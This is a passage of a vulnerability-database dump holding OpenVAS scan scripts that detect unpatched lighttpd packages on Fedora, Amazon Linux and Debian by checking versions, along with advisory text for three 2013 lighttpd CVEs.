software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867539);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:21:23 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-4560\", \"CVE-2013-4559\", \"CVE-2013-4508\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for lighttpd FEDORA-2014-2495\");\n\n tag_insight = \"Secure, fast, compliant and very flexible web-server which has been optimized\nfor high-performance environments. It has a very low memory footprint compared\nto other webservers and takes care of cpu-load. 
Its advanced feature-set\n(FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make\nit the perfect webserver-software for every server that is suffering load\nproblems.\n\";\n\n tag_affected = \"lighttpd on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2495\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128980.html\");\n script_summary(\"Check for the Version of lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.34~3.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:27", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120162", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120162", "title": "Amazon Linux Local Check: ALAS-2014-299", "type": "openvas", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-299.nasl 6735 2017-07-17 09:56:49Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120162\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:18:55 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-299\");\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in lighttpd before 1.4.33 allows remote attackers to cause a denial of service (segmentation fault and crash) via unspecified vectors that trigger FAMMonitorDirectory failures. lighttpd before 1.4.34, when SNI is enabled, configures weak SSL ciphers, which makes it easier for remote attackers to hijack sessions by inserting packets into the client-server data stream or obtain sensitive information by sniffing the network. 
lighttpd before 1.4.33 does not check the return value of the (1) setuid, (2) setgid, or (3) setgroups functions, which might cause lighttpd to run as root if it is restarted and allows remote attackers to gain privileges, as demonstrated by multiple calls to the clone function that cause setuid to fail when the user process limit is reached.\");\n script_tag(name:\"solution\", value:\"Run yum update lighttpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-299.html\");\n script_cve_id(\"CVE-2013-4560\", \"CVE-2013-4508\", \"CVE-2013-4559\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"lighttpd-mod_geoip\", rpm:\"lighttpd-mod_geoip~1.4.34~4.12.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd-fastcgi\", rpm:\"lighttpd-fastcgi~1.4.34~4.12.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd-debuginfo\", rpm:\"lighttpd-debuginfo~1.4.34~4.12.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.34~4.12.amzn1\", rls:\"AMAZON\")) != NULL) {\n 
security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"lighttpd-mod_mysql_vhost\", rpm:\"lighttpd-mod_mysql_vhost~1.4.34~4.12.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:48:31", "bulletinFamily": "scanner", "description": "Check for the Version of lighttpd", "modified": "2017-07-10T00:00:00", "published": "2014-02-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867540", "id": "OPENVAS:867540", "title": "Fedora Update for lighttpd FEDORA-2014-2506", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2014-2506\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867540);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:24:40 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-4560\", \"CVE-2013-4559\", \"CVE-2013-4508\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for lighttpd FEDORA-2014-2506\");\n\n tag_insight = \"Secure, fast, compliant and very flexible web-server which has been optimized\nfor high-performance environments. It has a very low memory footprint compared\nto other webservers and takes care of cpu-load. 
Its advanced feature-set\n(FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make\nit the perfect webserver-software for every server that is suffering load\nproblems.\n\";\n\n tag_affected = \"lighttpd on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2506\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128961.html\");\n script_summary(\"Check for the Version of lighttpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.34~3.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:51:38", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in the lighttpd web server.\n\nIt was discovered that SSL connections with client certificates\nstopped working after the DSA-2795-1 update of lighttpd. 
An upstream\npatch has now been applied that provides an appropriate identifier for\nclient certificate verification.\n\nCVE-2013-4508 \nIt was discovered that lighttpd uses weak ssl ciphers when SNI (Server\nName Indication) is enabled. This issue was solved by ensuring that\nstronger ssl ciphers are used when SNI is selected.\n\nCVE-2013-4559 \nThe clang static analyzer was used to discover privilege escalation\nissues due to missing checks around lighttpd's setuid, setgid, and\nsetgroups calls. Those are now appropriately checked.\n\nCVE-2013-4560 \nThe clang static analyzer was used to discover a use-after-free issue\nwhen the FAM stat cache engine is enabled, which is now fixed.", "modified": "2017-07-07T00:00:00", "published": "2013-11-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=892795", "id": "OPENVAS:892795", "title": "Debian Security Advisory DSA 2795-2 (lighttpd - several vulnerabilities)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2795.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2795-2 using nvtgen 1.0\n# Script version: 2.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"lighttpd on Debian Linux\";\ntag_insight = \"lighttpd is a small webserver and fast webserver developed with\nsecurity in mind and a lot of features.\nIt has support for\n\n* CGI, FastCGI and SSI\n* virtual hosts\n* URL rewriting\n* authentication (plain files, htpasswd, ldap)\n* transparent content compression\n* conditional configuration\n\nand configuration is straight-forward and easy.\";\ntag_solution = \"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 1.4.28-2+squeeze1.5.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.4.31-4+deb7u2.\n\nFor the testing distribution (jessie), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion lighttpd_1.4.33-1+nmu1.\n\nFor the testing (jessie) and unstable (sid) distributions, the regression\nproblem will be fixed soon.\n\nWe recommend that you upgrade your lighttpd packages.\";\ntag_summary = \"Several vulnerabilities have been discovered in the lighttpd web server.\n\nIt was discovered that SSL connections with client certificates\nstopped working after the DSA-2795-1 update of lighttpd. An upstream\npatch has now been applied that provides an appropriate identifier for\nclient certificate verification.\n\nCVE-2013-4508 \nIt was discovered that lighttpd uses weak ssl ciphers when SNI (Server\nName Indication) is enabled. 
This issue was solved by ensuring that\nstronger ssl ciphers are used when SNI is selected.\n\nCVE-2013-4559 \nThe clang static analyzer was used to discover privilege escalation\nissues due to missing checks around lighttpd's setuid, setgid, and\nsetgroups calls. Those are now appropriately checked.\n\nCVE-2013-4560 \nThe clang static analyzer was used to discover a use-after-free issue\nwhen the FAM stat cache engine is enabled, which is now fixed.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892795);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4560\", \"CVE-2013-4559\");\n script_name(\"Debian Security Advisory DSA 2795-2 (lighttpd - several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-11-17 00:00:00 +0100 (Sun, 17 Nov 2013)\");\n script_tag(name: \"cvss_base\", value:\"7.6\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2795.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 
exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": 
"AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:14", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-02-25T00:00:00", "id": "OPENVAS:1361412562310867540", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867540", "title": "Fedora Update for lighttpd FEDORA-2014-2506", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2014-2506\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867540\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-25 16:24:40 +0530 (Tue, 25 Feb 2014)\");\n script_cve_id(\"CVE-2013-4560\", \"CVE-2013-4559\", \"CVE-2013-4508\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for lighttpd FEDORA-2014-2506\");\n script_tag(name:\"affected\", value:\"lighttpd on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-2506\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128961.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lighttpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"lighttpd\", rpm:\"lighttpd~1.4.34~3.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:56", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in the lighttpd web server.\n\nIt was discovered that SSL connections with client certificates\nstopped working after the DSA-2795-1 update of lighttpd. An upstream\npatch has now been applied that provides an appropriate identifier for\nclient certificate verification.\n\nCVE-2013-4508\nIt was discovered that lighttpd uses weak ssl ciphers when SNI (Server\nName Indication) is enabled. This issue was solved by ensuring that\nstronger ssl ciphers are used when SNI is selected.\n\nCVE-2013-4559\nThe clang static analyzer was used to discover privilege escalation\nissues due to missing checks around lighttpd", "modified": "2019-03-18T00:00:00", "published": "2013-11-17T00:00:00", "id": "OPENVAS:1361412562310892795", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892795", "title": "Debian Security Advisory DSA 2795-2 (lighttpd - several vulnerabilities)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2795.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2795-2 using nvtgen 1.0\n# Script version: 2.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This 
program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892795\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4560\", \"CVE-2013-4559\");\n script_name(\"Debian Security Advisory DSA 2795-2 (lighttpd - several vulnerabilities)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-17 00:00:00 +0100 (Sun, 17 Nov 2013)\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2795.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"lighttpd on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 1.4.28-2+squeeze1.5.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.4.31-4+deb7u2.\n\nFor the testing distribution (jessie), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion lighttpd_1.4.33-1+nmu1.\n\nFor 
the testing (jessie) and unstable (sid) distributions, the regression\nproblem will be fixed soon.\n\nWe recommend that you upgrade your lighttpd packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the lighttpd web server.\n\nIt was discovered that SSL connections with client certificates\nstopped working after the DSA-2795-1 update of lighttpd. An upstream\npatch has now been applied that provides an appropriate identifier for\nclient certificate verification.\n\nCVE-2013-4508\nIt was discovered that lighttpd uses weak ssl ciphers when SNI (Server\nName Indication) is enabled. This issue was solved by ensuring that\nstronger ssl ciphers are used when SNI is selected.\n\nCVE-2013-4559\nThe clang static analyzer was used to discover privilege escalation\nissues due to missing checks around lighttpd's setuid, setgid, and\nsetgroups calls. Those are now appropriately checked.\n\nCVE-2013-4560\nThe clang static analyzer was used to discover a use-after-free issue\nwhen the FAM stat cache engine is enabled, which is now fixed.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", 
ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.28-2+squeeze1.5\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-doc\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-cml\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-magnet\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-mysql-vhost\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-trigger-b4-dl\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"lighttpd-mod-webdav\", ver:\"1.4.31-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-26T11:10:27", "bulletinFamily": "scanner", "description": "Check for the Version of lighttpd", "modified": "2018-01-26T00:00:00", "published": "2013-09-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=866877", "id": "OPENVAS:866877", "title": "Fedora Update for lighttpd FEDORA-2013-15345", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for lighttpd FEDORA-2013-15345\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, 
